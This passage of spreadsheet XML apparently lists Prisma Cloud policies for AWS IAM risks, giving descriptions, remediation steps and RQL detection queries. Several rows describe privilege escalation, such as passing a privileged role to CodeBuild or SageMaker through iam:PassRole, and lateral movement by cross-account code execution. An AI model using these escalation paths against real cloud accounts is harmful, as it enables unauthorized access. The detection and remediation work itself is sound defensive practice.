        <is>
          <t>AWS cross-account resource access through IAM policies</t>
        </is>
      </c>
      <c r="L3181" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3181" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3181" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3181" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3181" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3181" t="inlineStr"/>
      <c r="R3181" t="inlineStr"/>
      <c r="S3181" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3181" t="b">
        <v>1</v>
      </c>
      <c r="U3181" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3181" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3181" t="inlineStr">
        <is>
          <t>This policy identifies the AWS resources which can be accessed from another account (cross-account) through IAM policies. Ensure that the AWS resources provisioned in your AWS account are not accessible from other accounts to avoid sensitive data exposure and minimize security risks. The "cross-account access granted by the resource-based policy" and "IAM role trust relationship" are supported.</t>
        </is>
      </c>
      <c r="X3181" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Update the 'Principal' section of the policy to avoid cross-account access</t>
        </is>
      </c>
      <c r="Y318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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.cloud.account != dest.cloud.account AND dest.cloud.account != '*'</t>
        </is>
      </c>
      <c r="AA3181" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3181" t="inlineStr">
        <is>
          <t>2024-03-28 07:10:54</t>
        </is>
      </c>
      <c r="AC3181" t="inlineStr"/>
      <c r="AD3181" t="b">
        <v>1</v>
      </c>
      <c r="AE3181" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3181" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>3cbd881c-2320-4797-88a6-7176d9954941</t>
        </is>
      </c>
      <c r="AI3181" t="inlineStr">
        <is>
          <t>3cbd881c-2320-4797-88a6-7176d9954941</t>
        </is>
      </c>
      <c r="AJ3181" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3181" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3182">
      <c r="A3182" t="inlineStr"/>
      <c r="B3182" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3182" s="2" t="inlineStr"/>
      <c r="D3182" t="inlineStr"/>
      <c r="E3182" t="inlineStr"/>
      <c r="F3182" t="inlineStr"/>
      <c r="G3182" t="b">
        <v>1</v>
      </c>
      <c r="H31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82" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3182" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3182" t="inlineStr">
        <is>
          <t>Unprivileged Service Account that is inactive for over 90 days can assume a Service Account with admin privileges</t>
        </is>
      </c>
      <c r="L3182" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3182" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3182" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3182" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3182" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3182" t="inlineStr"/>
      <c r="R3182" t="inlineStr"/>
      <c r="S3182" t="inlineStr"/>
      <c r="T3182" t="b">
        <v>1</v>
      </c>
      <c r="U3182" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3182" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3182" t="inlineStr">
        <is>
          <t>Identifies unprivileged (not administrator) service accounts that have been inactive for 90 days or more which can assume service accounts with administrative permissions. This risk is amplified due to the attack surface offered by the presence of a stale resource, offering adversaries an opportunity to escalate their privileges in a case of compromise, thereby expanding the potential blast radius.</t>
        </is>
      </c>
      <c r="X3182" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the entity to which the role is attached ("Source"), the unprivileged inactive role ("Granted By Entity") and the privileged role ("Destination"). In cases where the source role ("Granted By Entity") and privileged role ("Destination") permissions are granted in different accounts, "Source" may contain administrative permissions for its original account.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If you wish to remove the inactive role entirely, browse to it and select 'delete'. Furthermore, stale resources and their permissions should be removed in order to maintain good security hygiene in the environment.</t>
        </is>
      </c>
      <c r="Y318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2" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.isadministrative = false AND grantedby.cloud.entity.type = 'role' AND grantedby.cloud.entity.lastlogin.days &gt; 90 AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3182" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3182" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3182" t="inlineStr"/>
      <c r="AD3182" t="b">
        <v>1</v>
      </c>
      <c r="AE3182" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3182" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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82" t="inlineStr">
        <is>
          <t>d5fbcdd3-7496-4c63-95c9-dfebbb6e3e4c</t>
        </is>
      </c>
      <c r="AI3182" t="inlineStr">
        <is>
          <t>d5fbcdd3-7496-4c63-95c9-dfebbb6e3e4c</t>
        </is>
      </c>
      <c r="AJ3182" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3182" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3183">
      <c r="A3183" t="inlineStr"/>
      <c r="B3183" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3183" s="2" t="inlineStr"/>
      <c r="D3183" t="n">
        <v>0</v>
      </c>
      <c r="E3183" t="n">
        <v>121</v>
      </c>
      <c r="F3183" t="n">
        <v>0</v>
      </c>
      <c r="G3183" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3183" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3183" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; CodeBuild permissions</t>
        </is>
      </c>
      <c r="L3183" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3183" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3183" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3183" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3183" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3183" t="inlineStr"/>
      <c r="R3183" t="inlineStr"/>
      <c r="S3183" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3183" t="b">
        <v>1</v>
      </c>
      <c r="U3183" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3183" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3183" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, codebuild:CreateProject, codebuild:StartBuild, codebuild:StartBuildBatch permissions, an adversary can create a new CodeBuild project and pass a more privileged existing role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3183"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8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3" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'codebuild:CreateProject', 'codebuild:StartBuild', 'codebuild:StartBuildBatch') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3183" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3183" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3183" t="inlineStr"/>
      <c r="AD3183" t="b">
        <v>1</v>
      </c>
      <c r="AE3183" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3183" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>939a2428-4033-44ec-a0da-29e1f3431fa0</t>
        </is>
      </c>
      <c r="AI3183" t="inlineStr">
        <is>
          <t>939a2428-4033-44ec-a0da-29e1f3431fa0</t>
        </is>
      </c>
      <c r="AJ3183" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3183" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3184">
      <c r="A3184" t="inlineStr"/>
      <c r="B3184" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3184" s="2" t="inlineStr"/>
      <c r="D3184" t="n">
        <v>0</v>
      </c>
      <c r="E3184" t="n">
        <v>121</v>
      </c>
      <c r="F3184" t="n">
        <v>0</v>
      </c>
      <c r="G3184" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3184" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3184" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; SageMaker create training job permissions</t>
        </is>
      </c>
      <c r="L3184" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3184" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3184" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3184" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3184" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3184" t="inlineStr"/>
      <c r="R3184" t="inlineStr"/>
      <c r="S3184" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3184" t="b">
        <v>1</v>
      </c>
      <c r="U3184" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3184" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3184" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and sagemaker:CreateTrainingJob permissions, an adversary can start a model training job and pass a more privileged existing role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3184"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18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4" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'sagemaker:CreateTrainingJob' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3184" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3184" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3184" t="inlineStr"/>
      <c r="AD3184" t="b">
        <v>1</v>
      </c>
      <c r="AE3184" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3184" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>4b3891a0-9c6e-4231-9251-08d0b644e3eb</t>
        </is>
      </c>
      <c r="AI3184" t="inlineStr">
        <is>
          <t>4b3891a0-9c6e-4231-9251-08d0b644e3eb</t>
        </is>
      </c>
      <c r="AJ3184" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3184" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3185">
      <c r="A3185" t="inlineStr"/>
      <c r="B3185" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3185" s="2" t="inlineStr"/>
      <c r="D3185" t="inlineStr"/>
      <c r="E3185" t="inlineStr"/>
      <c r="F3185" t="inlineStr"/>
      <c r="G3185" t="b">
        <v>1</v>
      </c>
      <c r="H31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85" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3185" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3185" t="inlineStr">
        <is>
          <t>Compute resource assigned a Service Account with a lateral movement finding to admin in another account through code execution on compute resources</t>
        </is>
      </c>
      <c r="L3185" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3185" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3185" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3185" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3185" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3185" t="inlineStr"/>
      <c r="R3185" t="inlineStr"/>
      <c r="S3185" t="inlineStr"/>
      <c r="T3185" t="b">
        <v>1</v>
      </c>
      <c r="U3185" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3185" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3185" t="inlineStr">
        <is>
          <t>Identifies compute resources with attached service accounts which have permissions to execute code on privileged compute resources in another account. This allows the source compute resource to execute code using the privileged compute resource's privileges within the second account. As such, a compromise of this compute resource could allow an adversary to escalate their privileges and further themselves within the environment, moving laterally between the first and second account, greatly increasing the potential blast radius. The service account's attachment to a compute resource exacerbates the issue as the attack surface is larger due to potential compute misconfigurations and weaknesses.</t>
        </is>
      </c>
      <c r="X3185" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the source compute resource ("Source"), their service account ("Granted By Entity") and their account ("Source Cloud Account"), the action which allows code execution ("Action"), the administrative compute resource ("Destination") and its account ("Destination Cloud Account").
In order to remove any administrative permissions and minimize the potential privilege escalation avenues, use the following remediation steps:
Browse to the permission grantor ("Granted By Entity") in the AWS Console for the first account. Select the 'Permissions' tab, and search for the action and scope we observed in the "investigate" page ("Action", "Destination").  If deemed unnecessary, remove the permissions by either editing the policy or replacing it (notice: editing a customer managed policy could affect other roles). Alternatively, the role can be removed entirely and substituted for a new, less privileged one. In order to fully remediate the issue, actions must be taken in the destination account as well, such as editing the resource-based policy for a Lambda so it does not allow the source role to perform actions on it. Lastly, review the permissions given to the compute resource ("Destination") in the second account and remove if deemed unnecessary.</t>
        </is>
      </c>
      <c r="Y318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5" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type in ('instance', 'function') AND action.name IN ( 'ec2:ModifyInstanceAttribute', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey', 'lambda:UpdateFunctionCode', 'lambda:UpdateFunctionConfiguration', 'lambda:AddPermission', 'glue:UpdateDevEndpoint' ) AND dest.cloud.resource.type IN ( 'Instance', 'function', 'devendpoint') AND dest.cloud.resource.isadministrative = true AND dest.cloud.account != source.cloud.account</t>
        </is>
      </c>
      <c r="AA3185" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3185" t="inlineStr">
        <is>
          <t>2024-10-14 06:04:42</t>
        </is>
      </c>
      <c r="AC3185" t="inlineStr"/>
      <c r="AD3185" t="b">
        <v>1</v>
      </c>
      <c r="AE3185" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3185" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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85" t="inlineStr">
        <is>
          <t>c3bc6080-3d17-4560-8b6d-f4e062b2ec86</t>
        </is>
      </c>
      <c r="AI3185" t="inlineStr">
        <is>
          <t>c3bc6080-3d17-4560-8b6d-f4e062b2ec86</t>
        </is>
      </c>
      <c r="AJ3185" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3185" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3186">
      <c r="A3186" t="inlineStr"/>
      <c r="B3186" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3186" s="2" t="inlineStr"/>
      <c r="D3186" t="inlineStr"/>
      <c r="E3186" t="inlineStr"/>
      <c r="F3186" t="inlineStr"/>
      <c r="G3186" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3186" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3186" t="inlineStr">
        <is>
          <t>AWS S3 bucket is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3186" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3186" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3186" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3186" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3186" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3186" t="inlineStr"/>
      <c r="R3186" t="inlineStr"/>
      <c r="S3186" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3186" t="b">
        <v>0</v>
      </c>
      <c r="U3186" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3186" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3186" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 Buckets with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3186" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS S3 bucket service
3. Find resource-based policy of the S3 bucket resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3186" t="inlineStr"/>
      <c r="Z3186" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 's3' AND dest.cloud.resource.type = 'bucket' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3186" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3186" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3186" t="inlineStr"/>
      <c r="AD3186" t="b">
        <v>1</v>
      </c>
      <c r="AE3186" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3186" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>c5389dab-e4a7-41f4-ae5c-b0b899429a9b</t>
        </is>
      </c>
      <c r="AI3186" t="inlineStr">
        <is>
          <t>c5389dab-e4a7-41f4-ae5c-b0b899429a9b</t>
        </is>
      </c>
      <c r="AJ3186" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3186" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3187">
      <c r="A3187" t="inlineStr"/>
      <c r="B3187" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3187" s="2" t="inlineStr"/>
      <c r="D3187" t="n">
        <v>0</v>
      </c>
      <c r="E3187" t="n">
        <v>0</v>
      </c>
      <c r="F3187" t="n">
        <v>209</v>
      </c>
      <c r="G3187" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3187" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3187" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3187" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3187" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3187" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3187" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3187" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3187" t="inlineStr"/>
      <c r="R3187" t="inlineStr"/>
      <c r="S3187" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3187" t="b">
        <v>1</v>
      </c>
      <c r="U3187" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3187" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3187" t="inlineStr">
        <is>
          <t>This policy identifies IAM Users with unused Metadata Read Permissions. Even "apparently harmless" permissions like "Metadata Read" in IAM can pose a risk if left unused for 90 days. Here's why:
- Information Gathering: An attacker might use these credentials to gather information about your cloud environment. This information could be used to identify vulnerabilities or plan further attacks.
- Lateral Movement: If attackers compromise an IAM user with Metadata Read, they could potentially use it to discover other resources within your AWS infrastructure.
- While Metadata Read itself doesn't allow direct data manipulation, the information gleaned can be valuable for attackers. Here's how to mitigate the risk:
Review and Remove: Regularly identify and disable unused IAM users with any level of Metadata access (Read or Write).
Least Privilege: Grant only the minimum permissions required for a user or machine identity to function. Metadata Read might not always be necessary.
Monitor Activity: Implement CloudTrail to monitor IAM user activity, including failed access attempts. This can help detect suspicious behavior.</t>
        </is>
      </c>
      <c r="X3187"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18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7" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3187" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3187" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3187" t="inlineStr"/>
      <c r="AD3187" t="b">
        <v>1</v>
      </c>
      <c r="AE3187" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3187" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>be5d9c68-4b13-42f1-8d84-b2098afe9f22</t>
        </is>
      </c>
      <c r="AI3187" t="inlineStr">
        <is>
          <t>be5d9c68-4b13-42f1-8d84-b2098afe9f22</t>
        </is>
      </c>
      <c r="AJ3187" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3187" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3188">
      <c r="A3188" t="inlineStr"/>
      <c r="B3188" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3188" s="2" t="inlineStr"/>
      <c r="D3188" t="inlineStr"/>
      <c r="E3188" t="inlineStr"/>
      <c r="F3188" t="inlineStr"/>
      <c r="G3188" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3188" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3188" t="inlineStr">
        <is>
          <t>AWS Lambda with IAM role with Amazon RDS database SQL query execution permissions</t>
        </is>
      </c>
      <c r="L3188" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3188" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3188" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3188" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3188" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3188" t="inlineStr"/>
      <c r="R3188" t="inlineStr"/>
      <c r="S3188" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3188" t="b">
        <v>1</v>
      </c>
      <c r="U3188" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3188" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3188" t="inlineStr">
        <is>
          <t>Having an AWS Lambda function with an IAM role that grants the 'rds-data:ExecuteStatement' and 'rds-data:BatchExecuteStatement' actions can be risky. This combination of permissions allows the Lambda function to execute SQL statements directly on Amazon RDS databases. If unauthorized access or compromise occurs, it could lead to potential data breaches, unauthorized modifications, or unauthorized access to sensitive information stored in the databases.</t>
        </is>
      </c>
      <c r="X3188"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8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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('rds-data:ExecuteStatement', 'rds-data:BatchExecuteStatement') AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3188" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3188" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3188" t="inlineStr"/>
      <c r="AD3188" t="b">
        <v>1</v>
      </c>
      <c r="AE3188" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3188" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>085ea00f-40e2-4833-9d11-22883eaf5b40</t>
        </is>
      </c>
      <c r="AI3188" t="inlineStr">
        <is>
          <t>085ea00f-40e2-4833-9d11-22883eaf5b40</t>
        </is>
      </c>
      <c r="AJ3188" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3188" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3189">
      <c r="A3189" t="inlineStr"/>
      <c r="B3189" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3189" s="2" t="inlineStr"/>
      <c r="D3189" t="inlineStr"/>
      <c r="E3189" t="inlineStr"/>
      <c r="F3189" t="inlineStr"/>
      <c r="G3189" t="b">
        <v>0</v>
      </c>
      <c r="H31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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3189" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3189" t="inlineStr">
        <is>
          <t>AWS Lambda Function with IAM write permissions</t>
        </is>
      </c>
      <c r="L3189" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3189" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3189" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3189" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3189" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3189" t="inlineStr"/>
      <c r="R3189" t="inlineStr"/>
      <c r="S3189" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3189" t="b">
        <v>1</v>
      </c>
      <c r="U3189" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3189" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3189" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Lambda functions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189" t="inlineStr">
        <is>
          <t>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18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89"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'lambda' AND source.cloud.resource.type = 'function'</t>
        </is>
      </c>
      <c r="AA3189" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3189" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3189" t="inlineStr"/>
      <c r="AD3189" t="b">
        <v>1</v>
      </c>
      <c r="AE3189" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3189" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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89" t="inlineStr">
        <is>
